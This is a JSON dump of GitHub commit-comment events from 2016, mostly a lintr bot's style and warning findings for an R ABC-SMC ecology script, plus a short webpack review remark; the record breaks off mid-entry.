{"id":"4592114872","type":"CommitCommentEvent","actor":{"login":"meriadec"},"repo":{"name":"SIGSEV/minus"},"payload":{"comment":{"id":19103023,"position":5,"line":25,"path":"webpack/build.js","commit_id":"758c874421cf5193e7a9fff26446d2ea66e82ee9","created_at":"2016-09-20T20:01:02Z","updated_at":"2016-09-20T20:01:02Z","body":"I think we should adopt the same format as `webpack/dev.js`\r\n\r\n```\r\n        loaders: ['css', 'sass', 'autoprefixer'],\r\n```\r\n\r\nI find it less cryptic than the `!` notation."}},"created_at":"2016-09-20T20:01:02Z"}
{"id":"4592115589","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/STEPCAM"},"payload":{"comment":{"id":19103024,"position":null,"line":null,"path":null,"commit_id":"3397674888e9ff85e578f207325d1a60f8a3ca4f","created_at":"2016-09-20T20:01:07Z","updated_at":"2016-09-20T20:01:07Z","body":"[R/ABC_SMC.R:2:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L2) *style:* **Variable and function names should be all lowercase.**\n```r\n​getRandomVals <- function(max_val)  {\n^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L15) *style:* **Variable and function names should be all lowercase.**\n```r\n​getFromPrevious <- function(inds, ws, disps, filts, comps)  {\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L22) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigma,\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:25:68:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L25) *style:* **Commas should always have a space after.**\n```r\n​  diff <- params[target] - cbind(disp_vals, filt_vals, comp_vals)[,target]\n                                                                   ^\n```\n[R/ABC_SMC.R:26:54:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L26) *style:* **Trailing whitespace is superfluous.**\n```r\n​  vals <- weights * dnorm(diff, mean = 0, sd = sigma)  \n                                                     ^~\n```\n[R/ABC_SMC.R:27:12:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L27) *style:* **Put spaces around all infix operators.**\n```r\n​  return( 1/sum(vals) )\n          ~^~\n```\n[R/ABC_SMC.R:31:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L31) *style:* **Variable and function names should be all lowercase.**\n```r\n​normalizeWeights <- function(x) {\n^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:65:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L65) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateDistance <- function(rich, even, div, opt_diff, obs, sd_vals)  {\n^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:69:40:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​  fit_optima <- (opt_diff / sd_vals[4])^2;\n                                      ~^~\n```\n[R/ABC_SMC.R:77:21:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L77) *style:* **Variable and function names should be all lowercase.**\n```r\n​ABC_SMC <- function(numParticles, species_fallout, taxa, esppres, n_traits,\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:79:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L79) *style:* **lines should not be more than 80 characters.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:79:46:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L79) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n                                             ^~~~~~~~\n```\n[R/ABC_SMC.R:82:6:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L82) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(i in seq_along(sd_vals)) {\n     ^\n```\n[R/ABC_SMC.R:83:7:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L83) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(sd_vals[[i]] == 0.000) {\n      ^\n```\n[R/ABC_SMC.R:85:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L85) *style:* **lines should not be more than 80 characters.**\n```r\n​           \"one of the community summary statistics shows no variation in your dataset\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:88:10:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L88) *style:* **Variable and function names should be all lowercase.**\n```r\n​  res <- detMnbsp(Ord, abundances)\n         ^~~~~~~~\n```\n[R/ABC_SMC.R:88:10:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L88) *warning:* **no visible global function definition for ‘detMnbsp’**\n```r\n​  res <- detMnbsp(Ord, abundances)\n         ^~~~~~~~\n```\n[R/ABC_SMC.R:91:18:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L91) *style:* **Variable and function names should be all lowercase.**\n```r\n​  disp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:92:18:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L92) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filt_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:93:18:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L93) *style:* **Variable and function names should be all lowercase.**\n```r\n​  comp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:95:13:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  fits <- 1:numParticles\n            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:96:17:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L96) *style:* **Variable and function names should be all lowercase.**\n```r\n​  rich_vec <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:97:16:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  eve_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:98:16:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  div_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:99:16:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L99) *style:* **Variable and function names should be all lowercase.**\n```r\n​  opt_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:105:21:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L105) *style:* **Variable and function names should be all lowercase.**\n```r\n​  weights <- rep(1, numParticles)\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:106:26:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L106) *style:* **Variable and function names should be all lowercase.**\n```r\n​  next_weights <- rep(1, numParticles)\n                         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:107:16:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L107) *style:* **Variable and function names should be all lowercase.**\n```r\n​  indices <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:114:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L114) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\"Found previous output, continuing from that output\\n\"); flush.console();\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:118:7:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L118) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n      ^\n```\n[R/ABC_SMC.R:118:10:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L118) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:118:23:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L118) *style:* **Commas should always have a space after.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                      ^\n```\n[R/ABC_SMC.R:118:29:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L118) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:139:5:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L139) *style:* **Variable and function names should be all lowercase.**\n```r\n​    numberAccepted <- 0\n    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:140:28:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L140) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:140:28:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L140) *warning:* **no visible global function definition for ‘normalizeWeights’**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:148:12:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L148) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted <= numParticles) {\n           ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:148:30:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L148) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted <= numParticles) {\n                             ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:19:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L152) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:19:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L152) *warning:* **no visible global function definition for ‘getRandomVals’**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:154:19:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L154) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights,\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:156:19:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L156) *warning:* **no visible global function definition for ‘perturb’**\n```r\n​        params <- perturb(params, sigma)\n                  ^~~~~~~\n```\n[R/ABC_SMC.R:166:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L166) *style:* **Trailing whitespace is superfluous.**\n```r\n​     \n^~~~~\n```\n[R/ABC_SMC.R:170:40:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L170) *style:* **Commas should always have a space after.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],row.names=c(1:taxa));\n                                       ^\n```\n[R/ABC_SMC.R:170:53:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L170) *style:* **Put spaces around all infix operators.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],row.names=c(1:taxa));\n                                                   ~^~\n```\n[R/ABC_SMC.R:170:59:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L170) *style:* **Commas should always have a space after.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],row.names=c(1:taxa));\n                                                          ^\n```\n[R/ABC_SMC.R:170:68:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L170) *style:* **Put spaces around all infix operators.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],row.names=c(1:taxa));\n                                                                  ~^~\n```\n[R/ABC_SMC.R:173:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L173) *style:* **Trailing whitespace is superfluous.**\n```r\n​      \n^~~~~~\n```\n[R/ABC_SMC.R:174:8:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L174) *style:* **Commented code should be removed.**\n```r\n​     # source(\"/Users/janzen/GitHub/STEPCAM/R/modified_dbFD.R\")\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:175:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L175) *style:* **lines should not be more than 80 characters.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, m = res[[1]], nb.sp = res[[2]]) \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:175:20:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L175) *style:* **Variable and function names should be all lowercase.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, m = res[[1]], nb.sp = res[[2]]) \n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:175:20:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L175) *warning:* **no visible global function definition for ‘strippedDbFd’**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, m = res[[1]], nb.sp = res[[2]]) \n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:175:82:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L175) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, m = res[[1]], nb.sp = res[[2]]) \n                                                                                 ^\n```\n[R/ABC_SMC.R:176:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L176) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ABC_SMC.R:177:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L177) *style:* **lines should not be more than 80 characters.**\n```r\n​      FRic <- FD_output$FRic # FRic = functional richness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:178:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L178) *style:* **lines should not be more than 80 characters.**\n```r\n​      FEve <- FD_output$FEve # FEve = functional evenness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:179:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L179) *style:* **lines should not be more than 80 characters.**\n```r\n​      FDiv <- FD_output$FDiv # FDiv = functional diversity (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:188:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L188) *style:* **lines should not be more than 80 characters.**\n```r\n​      # calculate distance of trait mean simulated community from that of observed\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:191:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L191) *style:* **lines should not be more than 80 characters.**\n```r\n​      # (inverse) fit of model: euclidian distance of FD and trait mean values of\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:193:14:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L193) *style:* **Variable and function names should be all lowercase.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]],\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:195:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L195) *style:* **Trailing whitespace is superfluous.**\n```r\n​      \n^~~~~~\n```\n[R/ABC_SMC.R:198:19:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L198) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_disp[numberAccepted] <- params[1]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:199:19:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L199) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_filt[numberAccepted] <- params[2]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:200:19:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L200) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_comp[numberAccepted] <- params[3]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:202:14:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L202) *style:* **Variable and function names should be all lowercase.**\n```r\n​        fits[numberAccepted] <- fit\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:203:18:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L203) *style:* **Variable and function names should be all lowercase.**\n```r\n​        rich_vec[numberAccepted] <- FRic[[1]]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:204:17:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L204) *style:* **Variable and function names should be all lowercase.**\n```r\n​        eve_vec[numberAccepted] <- FEve[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:17:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L205) *style:* **Variable and function names should be all lowercase.**\n```r\n​        div_vec[numberAccepted] <- FDiv[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:206:17:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L206) *style:* **Variable and function names should be all lowercase.**\n```r\n​        opt_vec[numberAccepted] <- mean_optimum;\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:24:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] = 1\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:40:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L209) *style:* **Use <-, not =, for assignment.**\n```r\n​          next_weights[numberAccepted] = 1\n                                       ^\n```\n[R/ABC_SMC.R:211:24:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L211) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] =\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:211:40:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L211) *style:* **Use <-, not =, for assignment.**\n```r\n​          next_weights[numberAccepted] =\n                                       ^\n```\n[R/ABC_SMC.R:212:13:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L212) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, disp_vals, filt_vals,\n            ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:9:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:27:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n                          ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:13:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L216) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n            ^\n```\n[R/ABC_SMC.R:216:14:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:34:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n                                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:222:21:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L222) *style:* **Put spaces around all infix operators.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                   ~^~\n```\n[R/ABC_SMC.R:222:22:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L222) *style:* **Variable and function names should be all lowercase.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                     ^~~~~~~~\n```\n[R/ABC_SMC.R:224:13:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n            ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:224:38:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n                                     ^~~~~~~~\n```\n[R/ABC_SMC.R:242:54:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L242) *style:* **Put spaces around all infix operators.**\n```r\n​    file_name <- paste(\"particles_t=\", t, \".txt\", sep=\"\", collapse = NULL)\n                                                    ~^~\n```\n[R/ABC_SMC.R:245:1:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L245) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\" \", mean(disp_vals), mean(filt_vals), mean(comp_vals), \"\\t\", \"accept rate = \",\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:246:9:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L246) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), \"\\n\")\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:246:32:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L246) *style:* **Put spaces around all infix operators.**\n```r\n​        numberAccepted / (tried-1), \"\\n\")\n                              ~^~\n```\n[R/ABC_SMC.R:249:27:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L249) *style:* **Commas should always have a space after.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^\n```\n[R/ABC_SMC.R:249:27:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L249) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:250:20:](https://github.com/thijsjanzen/STEPCAM/blob/3397674888e9ff85e578f207325d1a60f8a3ca4f/R/ABC_SMC.R#L250) *style:* **Variable and function names should be all lowercase.**\n```r\n​    